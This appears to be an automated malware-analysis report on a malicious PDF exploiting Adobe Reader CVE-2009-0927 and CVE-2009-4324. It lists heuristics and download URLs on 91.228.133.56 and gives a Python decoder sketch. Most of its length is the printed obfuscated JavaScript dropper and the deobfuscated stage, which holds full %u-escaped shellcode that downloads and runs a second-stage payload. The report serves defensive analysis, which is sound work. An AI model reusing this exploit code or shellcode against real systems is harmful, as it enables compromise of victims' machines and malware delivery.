MALICIOUS
Risk score: 310
Malware Insights
MITRE ATT&CK
- T1203 Exploitation for Client Execution
- T1059.007 JavaScript
The PDF carries an obfuscated JavaScript stage (an alphabet-index array decoded into a string and handed to a function looked up under the name "eval", itself assembled from alphabet characters) that exploits two Adobe Reader vulnerabilities: CVE-2009-0927 (Collab.getIcon stack buffer overflow) and CVE-2009-4324 (media.newPlayer use-after-free). The deobfuscated stage reads app.viewerVersion to pick a branch, heap-sprays a NOP sled plus shellcode, and then triggers the chosen API. Each branch carries its own copy of the shellcode with the second-stage URL embedded as little-endian %u escapes: the Collab.getIcon branch fetches d7.php?f=g and the media.newPlayer branch fetches d8.php?f=n, both from 91.228.133.56. The version gate is broken in the sample's favour: the second branch's bounds are joined with || rather than &&, so every viewer version that misses the Collab.getIcon ranges falls through to the media.newPlayer exploit. The embedded download URLs show a clear intent to fetch and run a further payload on the victim's system.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics (9)
- media.newPlayer — CVE-2009-4324 (critical; CVE match: exact; rule CVE_2009_4324): PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
- Collab.getIcon — CVE-2009-0927 (critical; CVE match: exact; rule CVE_2009_0927): PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
- Multi-CVE Adobe Reader JavaScript exploit kit (critical; rule PDF_ADOBE_READER_MULTI_CVE_JS_KIT): One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
- Generic recovered JavaScript exploit stage (high; rule PDF_GENERIC_STAGE_RECOVERY): Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
- JavaScript action (low; 2 related findings; rule PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF exploit shellcode contains an embedded download URL (high; rule PDF_JS_SHELLCODE_DOWNLOAD_URL): Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
- Embedded JS stream (low; rule PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Suspicious extracted artifact (info; rule EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info; rule EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://91.228.133.56/my090911/1723f1e8e0d96b7f8bce5aca1cff6805/d7.php?f=g (referenced by PDF JavaScript)
  - http://91.228.133.56/my090911/1723f1e8e0d96b7f8bce5aca1cff6805/d8.php?f=n (referenced by PDF JavaScript)
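Two of the transforms named by the PDF_GENERIC_STAGE_RECOVERY and PDF_JS_SHELLCODE_DOWNLOAD_URL rules above, re-implemented in Python as an added example (this is not the analyzer's code). It applies the alphabet-index-array decoder to a constructed slice of this sample's first stage (the alphabet string and the first 20 entries of its index array), decodes %u-escaped shellcode the way unescape() plus Reader's UTF-16LE string layout does, and carves the NUL-terminated download URL out of the decoded bytes. The shellcode tails are copied from the two shellcode variables of the recovered stage; only the slicing is constructed.

```python
# Added example (not the analyzer's own code): two of the stage-recovery transforms
# named above, applied to constructed slices of this sample's JavaScript, followed by
# carving the download URL out of the %u-escaped shellcode.
import re

# Alphabet string from the first extracted stage (javascript_obj0076_000.js).
ALPHABET = "h_va,Dg>r;coNV<+m|u=2I ]%1-Pt4fB{9s63&Sn()i7plbA0'8d[:y.Fx@Ce5}wE"

# Constructed input: only the first 20 entries of the sample's `z` index array.
INDICES = [2, 3, 8, 22, 1, 25, 11, 19, 49, 24, 18, 50, 36, 35, 35, 24, 18, 56, 59, 64]

# Constructed input: the tail of each shellcode string from the recovered stage.
# Everything up to the URL is machine code; the URL is a NUL-terminated ASCII run.
SHELLCODE_TAILS = {
    "_1o": "%u6F89%uBD01%uCA33%u5B8A%uC61B%u7946%u1A36%u702F%u7468%u7074%u2F3A%u392F"
           "%u2E31%u3232%u2E38%u3331%u2E33%u3635%u6D2F%u3079%u3039%u3139%u2F31%u3731"
           "%u3332%u3166%u3865%u3065%u3964%u6236%u6637%u6238%u6563%u6135%u6163%u6331"
           "%u6666%u3836%u3530%u642F%u2E37%u6870%u3F70%u3D66%u0067%u0000",
    "_2o": "%u6F89%uBD01%uCA33%u5B8A%uC61B%u7946%u1A36%u702F%u7468%u7074%u2F3A%u392F"
           "%u2E31%u3232%u2E38%u3331%u2E33%u3635%u6D2F%u3079%u3039%u3139%u2F31%u3731"
           "%u3332%u3166%u3865%u3065%u3964%u6236%u6637%u6238%u6563%u6135%u6163%u6331"
           "%u6666%u3836%u3530%u642F%u2E38%u6870%u3F70%u3D66%u006E%u0000",
}

ESCAPE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")
URL = re.compile(rb"https?://[\x21-\x7e]+")


def decode_alphabet_index(alphabet, indices):
    """The stage's `s += a[z[i]]` loop: every index selects one alphabet character."""
    return "".join(alphabet[i] for i in indices)


def js_unescape_to_bytes(s):
    """JavaScript unescape() followed by the in-memory UTF-16LE layout Reader sprays.

    %uXXXX and %XX each yield one 16-bit code unit; literal characters are kept as
    their own code unit. Every code unit becomes two little-endian bytes, which is
    why the shellcode author writes %u7468 to get the bytes 68 74 ("ht").
    """
    out = bytearray()
    i = 0
    while i < len(s):
        m = ESCAPE.match(s, i)
        if m:
            unit = int(m.group(1) or m.group(2), 16)
            i = m.end()
        else:
            unit = ord(s[i]) & 0xFFFF
            i += 1
        out += unit.to_bytes(2, "little")
    return bytes(out)


def carve_urls(blob):
    """Printable http(s) runs in decoded shellcode; the NUL terminator ends the match."""
    return [m.group().decode("ascii") for m in URL.finditer(blob)]


def carve_stage_urls(tails=SHELLCODE_TAILS):
    """Map each shellcode variable to the URL(s) its decoded bytes carry."""
    return {name: carve_urls(js_unescape_to_bytes(text)) for name, text in tails.items()}


if __name__ == "__main__":
    print(decode_alphabet_index(ALPHABET, INDICES))
    for name, urls in carve_stage_urls().items():
        print(name, urls)
```

Running it prints the opening of the recovered stage (`var _1o='%u8366%uFCE`) and one URL per shellcode variable, d7.php?f=g for _1o and d8.php?f=n for _2o, which is exactly the pairing the two exploit branches use. The URL is found because it is stored as a contiguous ASCII run; a scan like this does not see API or library names that the shellcode assembles from 4-byte immediates.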
Extracted artifacts (3)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0076_000.js | pdf-javascript-stream | PDF /JS object 76 at offset 0x38A | 13369 bytes |

SHA-256: 0fbf7ad6b4842286a88df84fc065db9fa5bb09421e9b59d39fce07e60f22618d

Preview (first 1,000 lines of the extracted script):
a="h_va,Dg>r;coNV<+m|u=2I ]%1-Pt4fB{9s63&Sn()i7plbA0'8d[:y.Fx@Ce5}wE";
w='';
w+='sl';
w+='i';
w+="c"+a[60];
j='b343tb3g';
j=j[w];
z
=new Array
(2,3,8,22,1,25,11,19,49,24,18,50,36,35,35,24,18,56,59,64,29,24,18,50,61,56,59,24,18,43,61,64,29,24,18,64,33,36,29,24,18,36,36,61,56,24,18,35,29,59,48,24,18,29,48,50,31,24,18,50,31,36,48,24,18,48,59,29,48,24,18,43,48,50,31,24,18,61,35,25,59,24,18,43,35,50,31,24,18,36,36,48,50,24,18,35,35,5,31,24,18,61,64,50,31,24,18,48,36,36,59,24,18,36,36,43,29,24,18,50,25,20,59,24,18,25,61,64,64,24,18,56,56,25,48,24,18,31,50,56,56,24,18,29,48,50,31,24,18,59,36,36,48,24,18,36,33,29,35,24,18,43,61,48,35,24,18,50,43,56,31,24,18,20,29,36,29,24,18,64,29,50,61,24,18,61,25,43,61,24,18,64,31,64,33,24,18,61,25,29,59,24,18,50,31,61,35,24,18,36,59,43,61,24,18,43,29,50,31,24,18,43,50,36,61,24,18,56,61,48,36,24,18,50,31,61,35,24,18,20,48,43,35,24,18,56,61,48,36,24,18,59,33,36,36,24,18,29,25,29,33,24,18,47,5,56,59,24,18,59,61,48,36,24,18,5,31,36,36,24,18,31,64,48,56,24,18,36,50,25,48,24,18,43,29,56,20,24,18,59,25,48,50,24,18,48,5,59,31,24,18,5,47,48,36,24,18,64,31,29,48,24,18,36,31,56,25,24,18,43,61,25,56,24,18,61,64,64,35,24,18,61,64,50,31,24,18,48,36,20,29,24,18,35,35,5,5,24,18,48,59,50,31,24,18,50,5,29,31,24,18,64,59,29,35,24,18,61,29,56,56,24,18,48,59,20,29,24,18,5,50,50,31,24,18,5,5,48,36,24,18,48,29,50,31,24,18,48,36,50,31,24,18,47,31,59,61,24,18,61,33,61,64,24,18,64,31,59,36,24,18,47,5,61,36,24,18,35,50,50,31,24,18,50,48,20,48,24,18,48,59,43,5,24,18,43,29,36,36,24,18,33,35,48,36,24,18,56,36,64,31,24,18,35,50,50,31,24,18,50,31,48,50,24,18,35,47,56,43,24,18,61,33,48,61,24,18,33,50,64,50,24,18,56,56,56,56,24,18,64,20,56,56,24,18,64,50,56,33,24,18,48,48,48,48,24,18,48,48,48,48,24,18,61,48,61,50,24,18,29,48,35,47,24,18,56,56,35,50,24,18,48,48,48,48,24,18,61,48,48,48,24,18,59,48,50,36,24,18,61,48,25,33,24,18,50,31,61,61,24,18,50,31,64,59,24,18,25,48,61,64,24,18,59,36,50,36,24,18,56,56,48,61,24,18,35,50,64,36,24,18,35,64,35,56,24,18,48,48,48,48,24,18,43,61,35,50,24,18,35,59,43,20,24,18,61,29,35,5,24,18,25,35,56,56,24,18,59,29,50,36,24,18,50,31,48,50,24,18,64,50,64,50,24,18,56,56,35,25,24,18,56,5
6,56,56,24,18,48,20,64,31,24,18,43,20,64,31,24,18,64,59,50,25,24,18,48,25,48,29,24,18,48,48,48,48,24,18,61,59,50,5,24,18,48,59,20,29,24,18,48,29,59,43,24,18,43,20,20,29,24,18,35,43,35,61,24,18,59,43,43,36,24,18,20,29,29,29,24,18,43,35,48,29,24,18,36,36,43,20,24,18,59,43,36,20,24,18,20,29,29,29,24,18,20,48,48,50,24,18,43,36,20,5,24,18,61,36,20,48,24,18,56,50,35,50,24,18,48,48,48,48,24,18,56,56,48,48,24,18,48,59,61,35,24,18,64,50,50,31,24,18,59,33,36,36,24,18,59,43,61,25,24,18,25,5,29,29,24,18,43,43,48,48,24,18,35,20,43,48,24,18,59,43,43,29,24,18,25,5,29,29,24,18,20,64,48,61,24,18,35,59,35,29,24,18,59,35,35,59,24,18,25,5,29,29,24,18,48,48,48,33,24,18,50,47,61,33,24,18,48,29,59,25,24,18,50,50,36,48,24,18,25,5,29,29,24,18,29,25,48,29,24,18,35,47,61,25,24,18,35,47,48,48,24,18,61,36,48,48,24,18,35,47,61,43,24,18,56,56,48,48,24,18,25,29,61,35,24,18,59,48,50,61,24,18,25,35,43,61,24,18,48,48,35,47,24,18,56,56,61,36,24,18,48,29,61,35,24,18,48,48,35,47,24,18,64,31,50,36,24,18,61,36,48,59,24,18,61,35,56,56,24,18,50,36,48,29,24,18,48,59,59,36,24,18,48,20,64,31,24,18,25,36,64,31,24,18,50,48,29,43,24,18,48,48,36,56,24,18,56,47,43,61,24,18,50,48,29,43,24,18,48,48,36,56,24,18,59,29,43,61,24,18,48,48,35,47,24,18,56,64,35,47,24,18,61,35,56,56,24,18,64,50,48,50,24,18,56,64,33,59,24,18,56,56,56,56,24,18,29,64,50,64,24,18,64,59,48,64,24,18,56,64,33,50,24,18,48,64,50,47,24,18,35,56,50,33,24,18,31,5,48,25,24,18,59,47,36,36,24,18,61,31,50,47,24,18,59,35,25,31,24,18,43,33,29,35,24,18,25,47,36,35,24,18,43,48,20,56,24,18,43,29,35,50,24,18,43,48,43,29,24,18,20,56,36,47,24,18,36,33,20,56,24,18,20,64,36,25,24,18,36,20,36,20,24,18,20,64,36,50,24,18,36,36,36,25,24,18,20,64,36,36,24,18,36,35,36,61,24,18,35,5,20,56,24,18,36,48,43,33,24,18,36,48,36,33,24,18,36,25,36,33,24,18,20,56,36,25,24,18,36,43,36,25,24,18,36,36,36,20,24,18,36,25,35,35,24,18,36,50,35,61,24,18,36,48,35,61,24,18,36,33,35,29,24,18,35,20,36,35,24,18,35,35,36,43,24,18,35,20,36,50,24,18,35,61,35,36,24,18,35,25,36,61,24,18,35,25,35,36,24
,18,35,36,36,25,24,18,35,35,35,35,24,18,36,50,36,35,24,18,36,61,36,48,24,18,35,29,20,56,24,18,20,64,36,43,24,18,35,50,43,48,24,18,36,56,43,48,24,18,36,5,35,35,24,18,48,48,35,43,24,18,48,48,48,48,49,9,2,3,8,22,1,20,11,19,49,24,18,50,36,35,35,24,18,56,59,64,29,24,18,50,61,56,59,24,18,43,61,64,29,24,18,64,33,36,29,24,18,36,36,61,56,24,18,35,29,59,48,24,18,29,48,50,31,24,18,50,31,36,48,24,18,48,59,29,48,24,18,43,48,50,31,24,18,61,35,25,59,24,18,43,35,50,31,24,18,36,36,48,50,24,18,35,35,5,31,24,18,61,64,50,31,24,18,48,36,36,59,24,18,36,36,43,29,24,18,50,25,20,59,24,18,25,61,64,64,24,18,56,56,25,48,24,18,31,50,56,56,24,18,29,48,50,31,24,18,59,36,36,48,24,18,36,33,29,35,24,18,43,61,48,35,24,18,50,43,56,31,24,18,20,29,36,29,24,18,64,29,50,61,24,18,61,25,43,61,24,18,64,31,64,33,24,18,61,25,29,59,24,18,50,31,61,35,24,18,36,59,43,61,24,18,43,29,50,31,24,18,43,50,36,61,24,18,56,61,48,36,24,18,50,31,61,35,24,18,20,48,43,35,24,18,56,61,48,36,24,18,59,33,36,36,24,18,29,25,29,33,24,18,47,5,56,59,24,18,59,61,48,36,24,18,5,31,36,36,24,18,31,64,48,56,24,18,36,50,25,48,24,18,43,29,56,20,24,18,59,25,48,50,24,18,48,5,59,31,24,18,5,47,48,36,24,18,64,31,29,48,24,18,36,31,56,25,24,18,43,61,25,56,24,18,61,64,64,35,24,18,61,64,50,31,24,18,48,36,20,29,24,18,35,35,5,5,24,18,48,59,50,31,24,18,50,5,29,31,24,18,64,59,29,35,24,18,61,29,56,56,24,18,48,59,20,29,24,18,5,50,50,31,24,18,5,5,48,36,24,18,48,29,50,31,24,18,48,36,50,31,24,18,47,31,59,61,24,18,61,33,61,64,24,18,64,31,59,36,24,18,47,5,61,36,24,18,35,50,50,31,24,18,50,48,20,48,24,18,48,59,43,5,24,18,43,29,36,36,24,18,33,35,48,36,24,18,56,36,64,31,24,18,35,50,50,31,24,18,50,31,48,50,24,18,35,47,56,43,24,18,61,33,48,61,24,18,33,50,64,50,24,18,56,56,56,56,24,18,64,20,56,56,24,18,64,50,56,33,24,18,48,48,48,48,24,18,48,48,48,48,24,18,61,48,61,50,24,18,29,48,35,47,24,18,56,56,35,50,24,18,48,48,48,48,24,18,61,48,48,48,24,18,59,48,50,36,24,18,61,48,25,33,24,18,50,31,61,61,24,18,50,31,64,59,24,18,25,48,61,64,24,18,59,36,50,36,24,18,56,56,48,61,24,18,35
,50,64,36,24,18,35,64,35,56,24,18,48,48,48,48,24,18,43,61,35,50,24,18,35,59,43,20,24,18,61,29,35,5,24,18,25,35,56,56,24,18,59,29,50,36,24,18,50,31,48,50,24,18,64,50,64,50,24,18,56,56,35,25,24,18,56,56,56,56,24,18,48,20,64,31,24,18,43,20,64,31,24,18,64,59,50,25,24,18,48,25,48,29,24,18,48,48,48,48,24,18,61,59,50,5,24,18,48,59,20,29,24,18,48,29,59,43,24,18,43,20,20,29,24,18,35,43,35,61,24,18,59,43,43,36,24,18,20,29,29,29,24,18,43,35,48,29,24,18,36,36,43,20,24,18,59,43,36,20,24,18,20,29,29,29,24,18,20,48,48,50,24,18,43,36,20,5,24,18,61,36,20,48,24,18,56,50,35,50,24,18,48,48,48,48,24,18,56,56,48,48,24,18,48,59,61,35,24,18,64,50,50,31,24,18,59,33,36,36,24,18,59,43,61,25,24,18,25,5,29,29,24,18,43,43,48,48,24,18,35,20,43,48,24,18,59,43,43,29,24,18,25,5,29,29,24,18,20,64,48,61,24,18,35,59,35,29,24,18,59,35,35,59,24,18,25,5,29,29,24,18,48,48,48,33,24,18,50,47,61,33,24,18,48,29,59,25,24,18,50,50,36,48,24,18,25,5,29,29,24,18,29,25,48,29,24,18,35,47,61,25,24,18,35,47,48,48,24,18,61,36,48,48,24,18,35,47,61,43,24,18,56,56,48,48,24,18,25,29,61,35,24,18,59,48,50,61,24,18,25,35,43,61,24,18,48,48,35,47,24,18,56,56,61,36,24,18,48,29,61,35,24,18,48,48,35,47,24,18,64,31,50,36,24,18,61,36,48,59,24,18,61,35,56,56,24,18,50,36,48,29,24,18,48,59,59,36,24,18,48,20,64,31,24,18,25,36,64,31,24,18,50,48,29,43,24,18,48,48,36,56,24,18,56,47,43,61,24,18,50,48,29,43,24,18,48,48,36,56,24,18,59,29,43,61,24,18,48,48,35,47,24,18,56,64,35,47,24,18,61,35,56,56,24,18,64,50,48,50,24,18,56,64,33,59,24,18,56,56,56,56,24,18,29,64,50,64,24,18,64,59,48,64,24,18,56,64,33,50,24,18,48,64,50,47,24,18,35,56,50,33,24,18,31,5,48,25,24,18,59,47,36,36,24,18,61,31,50,47,24,18,59,35,25,31,24,18,43,33,29,35,24,18,25,47,36,35,24,18,43,48,20,56,24,18,43,29,35,50,24,18,43,48,43,29,24,18,20,56,36,47,24,18,36,33,20,56,24,18,20,64,36,25,24,18,36,20,36,20,24,18,20,64,36,50,24,18,36,36,36,25,24,18,20,64,36,36,24,18,36,35,36,61,24,18,35,5,20,56,24,18,36,48,43,33,24,18,36,48,36,33,24,18,36,25,36,33,24,18,20,56,36,25,24,18,36,43,36,25,2
4,18,36,36,36,20,24,18,36,25,35,35,24,18,36,50,35,61,24,18,36,48,35,61,24,18,36,33,35,29,24,18,35,20,36,35,24,18,35,35,36,43,24,18,35,20,36,50,24,18,35,61,35,36,24,18,35,25,36,61,24,18,35,25,35,36,24,18,35,36,36,25,24,18,35,35,35,35,24,18,36,50,36,35,24,18,36,61,36,48,24,18,35,29,20,56,24,18,20,64,36,50,24,18,35,50,43,48,24,18,36,56,43,48,24,18,36,5,35,35,24,18,48,48,35,64,24,18,48,48,48,48,49,9,30,18,39,10,28,42,11,39,22,1,36,11,40,41,32,2,3,8,22,1,29,11,19,3,44,44,55,2,42,60,63,60,8,13,60,8,34,42,11,39,55,28,11,38,28,8,42,39,6,40,41,9,1,29,11,19,1,29,11,55,8,60,44,45,3,10,60,40,49,55,49,4,49,49,41,9,63,0,42,45,60,40,1,29,11,55,45,60,39,6,28,0,14,29,41,32,1,29,11,15,19,49,48,49,9,62,1,29,11,19,44,3,8,34,60,21,39,28,40,1,29,11,4,25,48,41,9,8,60,28,18,8,39,22,1,29,11,9,62,30,18,39,10,28,42,11,39,22,1,61,11,40,41,32,30,18,39,10,28,42,11,39,22,1,35,11,40,41,32,2,3,8,22,1,43,11,19,49,44,58,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,22,53,22,54,54,54,54,25,25,25,49,9,18,28,42,45,55,44,8,42,39,28,51,40,1,43,11,4,39,60,63,22,5,3,28,60,40,41,41,9,62,2,3,8,22,1,50,11,19,25,20,48,48,48,9,1,33,11,19,39,60,63,22,47,8,8,3,54,40,41,9,2,3,8,22,1,25,11,48,19,49,24,18,33,48,33,48,24,18,33,48,33,48,49,9,2,3,8,22,1,25,11,25,19,1,20,11,9,1,25,11,48,19,18,39,60,34,10,3,44,60,40,1,25,11,48,41,9,1,25,11,25,19,18,39,60,34,10,3,44,60,40,1,25,11,25,41,9,63,0,42,45,60,40,1,25,11,48,55,45,60,39,6,28,0,14,19,48,57,50,48,48,48,41,32,1,25,11,48,15,19,1,25,11,48,9,62,1,25,11,48,19,1,25,11,48,55,34,18,46,34,28,8,40,48,4,48,57,50,48,48,48,26,1,25,11,25,55,45,60,39,6,28,0,41,9,22,30,11,8,40,1,25,11,20,19,48,9,1,25,11,20,14,1,50,11,9,1,25,11,20,15,15,41,32,1,33,11,52,1,25,11,20,23,19,1,25,11,48,15,1,25,11,25,9,62,42,30,40,1,50,11,41,32,1,35,11,40,41,9,1,35,11,40,41,9,28,8,54,32,28,0,42,34,55,16,60,51,42,3,55,39,60,63,27,45,3,54,60,8,40,39,18,45,45,41,9,62,10,3,28,10,0,40,60,41,32,62,1,35,11,40,41,9,62,62,30,18,39,10,28,42,11,39,22,1,25,11,36,40,41,32,2,3,8,22,1,25,11,29,19
,18,39,60,34,10,3,44,60,40,1,25,11,41,9,1,25,11,61,19,18,39,60,34,10,3,44,60,40,49,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,49,41,15,1,25,11,29,9,1,25,11,35,19,18,39,60,34,10,3,44,60,40,49,24,18,33,48,33,48,24,18,33,48,33,48,49,41,9,1,25,11,43,19,25,48,9,1,25,11,50,19,1,25,11,43,15,1,25,11,61,55,45,60,39,6,28,0,9,63,0,42,45,60,40,1,25,11,35,55,45,60,39,6,28,0,14,1,25,11,50,41,1,25,11,35,15,19,1,25,11,35,9,1,25,11,33,19,1,25,11,35,55,34,18,46,34,28,8,42,39,6,40,48,4,1,25,11,50,41,9,1,20,11,20,19,1,25,11,35,55,34,18,46,34,28,8,42,39,6,40,48,4,1,25,11,35,55,45,60,39,6,28,0,26,1,25,11,50,41,9,63,0,
42,45,60,40,1,20,11,20,55,45,60,39,6,28,0,15,1,25,11,50,14,48,57,29,48,48,48,48,41,1,20,11,20,19,1,20,11,20,15,1,20,11,20,15,1,25,11,33,9,1,20,11,48,19,39,60,63,22,47,8,8,3,54,40,41,9,30,11,8,40,1,20,11,25,19,48,9,1,20,11,25,14,25,50,48,9,1,20,11,25,15,15,41,1,20,11,48,52,1,20,11,25,23,19,1,20,11,20,15,1,25,11,61,9,2,3,8,22,1,20,11,36,19,29,48,25,20,9,2,3,8,22,1,20,11,29,19,47,8,8,3,54,40,1,20,11,36,41,9,30,11,8,40,1,20,11,25,19,48,9,1,20,11,25,14,1,20,11,36,9,1,20,11,25,15,15,41,32,1,20,11,29,52,1,20,11,25,23,19,18,39,60,34,10,3,44,60,40,49,24,48,3,24,48,3,24,48,3,24,48,3,49,41,9,62,59,11,45,45,3,46,55,6,60,28,21,10,11,39,40,1,20,11,29,15,49,1,12,55,46,18,39,51,45,60,49,41,9,62,2,3,8,22,1,29,11,19,1,36,11,40,41,9,42,30,40,40,40,1,29,11,7,50,33,61,48,41,37,37,40,1,29,11,14,33,48,61,48,41,41,17,17,40,40,1,29,11,7,19,50,48,48,48,41,37,37,40,1,29,11,14,19,50,25,48,20,41,41,41,32,1,25,11,36,40,41,9,62,60,45,34,60,22,42,30,40,40,1,29,11,7,19,33,25,48,48,41,17,17,40,1,29,11,14,19,33,20,48,48,41,17,17,40,1,29,11,7,19,50,25,48,36,41,17,17,40,1,29,11,14,19,50,25,48,43,41,41,32,1,61,11,40,41,9,62);
s='';
b
=
'al';
b2
=a[60]
+
a[2]+b;for
(i=0;i<z.length;i++)
{s+=a[z[i]]}
e=(j());
e=e[b2];
e(s);

| Filename | Kind | Source | Size |
|---|---|---|---|
| generic_stage_recovery_000.js | deobfuscated-js | generic stage recovery (alphabet-index-array) from JavaScript object 76 at offset 0x38A | 4469 bytes |

SHA-256: b0e7c2cf76262d9db804dbb0f3e74700e7a536e2ab7500e4858d0adff9e547c6

Detection
ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 6 eval/decoder/string-building tokens)

Preview (first 1,000 lines of the extracted script):
var _1o='%u8366%uFCE4%u85FC%u75E4%uE934%u335F%u64C0%u408B%u8B30%u0C40%u708B%u561C%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5175%uEBE9%u514C%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%uADFC%uC503%uDB33%uBE0F%u3810%u74F2%uC108%u0DCB%uDA03%uEB40%u3BF1%u751F%u5EE6%u5E8B%u0324%u66DD%u0C8B%u8D4B%uEC46%u54FF%u0C24%uD88B%uDD03%u048B%u038B%uABC5%u595E%uEBC3%uAD53%u688B%u8020%u0C7D%u7433%u9603%uF3EB%u688B%u8B08%u6AF7%u5905%u98E8%uFFFF%uE2FF%uE8F9%u0000%u0000%u5058%u406A%uFF68%u0000%u5000%uC083%u5019%u8B55%u8BEC%u105E%uC383%uFF05%u68E3%u6E6F%u0000%u7568%u6C72%u546D%u16FF%uC483%u8B08%uE8E8%uFF61%uFFFF%u02EB%u72EB%uEC81%u0104%u0000%u5C8D%u0C24%u04C7%u7224%u6765%uC773%u2444%u7604%u3372%uC732%u2444%u2008%u732D%u5320%uF868%u0000%uFF00%u0C56%uE88B%uC933%uC751%u1D44%u7700%u6270%uC774%u1D44%u2E05%u6C64%uC66C%u1D44%u0009%u8A59%u04C1%u8830%u1D44%u4104%u6A51%u6A00%u5300%u6A57%uFF00%u1456%uC085%u1675%u006A%uFF53%u0456%u006A%uEB83%u530C%u56FF%u8304%u0CC3%u02EB%u13EB%u8047%u003F%uFA75%u8047%u003F%uC475%u006A%uFE6A%u56FF%uE808%uFE9C%uFFFF%u4E8E%uEC0E%uFE98%u0E8A%u6F89%uBD01%uCA33%u5B8A%uC61B%u7946%u1A36%u702F%u7468%u7074%u2F3A%u392F%u2E31%u3232%u2E38%u3331%u2E33%u3635%u6D2F%u3079%u3039%u3139%u2F31%u3731%u3332%u3166%u3865%u3065%u3964%u6236%u6637%u6238%u6563%u6135%u6163%u6331%u6666%u3836%u3530%u642F%u2E37%u6870%u3F70%u3D66%u0067%u0000';var 
_2o='%u8366%uFCE4%u85FC%u75E4%uE934%u335F%u64C0%u408B%u8B30%u0C40%u708B%u561C%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5175%uEBE9%u514C%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%uADFC%uC503%uDB33%uBE0F%u3810%u74F2%uC108%u0DCB%uDA03%uEB40%u3BF1%u751F%u5EE6%u5E8B%u0324%u66DD%u0C8B%u8D4B%uEC46%u54FF%u0C24%uD88B%uDD03%u048B%u038B%uABC5%u595E%uEBC3%uAD53%u688B%u8020%u0C7D%u7433%u9603%uF3EB%u688B%u8B08%u6AF7%u5905%u98E8%uFFFF%uE2FF%uE8F9%u0000%u0000%u5058%u406A%uFF68%u0000%u5000%uC083%u5019%u8B55%u8BEC%u105E%uC383%uFF05%u68E3%u6E6F%u0000%u7568%u6C72%u546D%u16FF%uC483%u8B08%uE8E8%uFF61%uFFFF%u02EB%u72EB%uEC81%u0104%u0000%u5C8D%u0C24%u04C7%u7224%u6765%uC773%u2444%u7604%u3372%uC732%u2444%u2008%u732D%u5320%uF868%u0000%uFF00%u0C56%uE88B%uC933%uC751%u1D44%u7700%u6270%uC774%u1D44%u2E0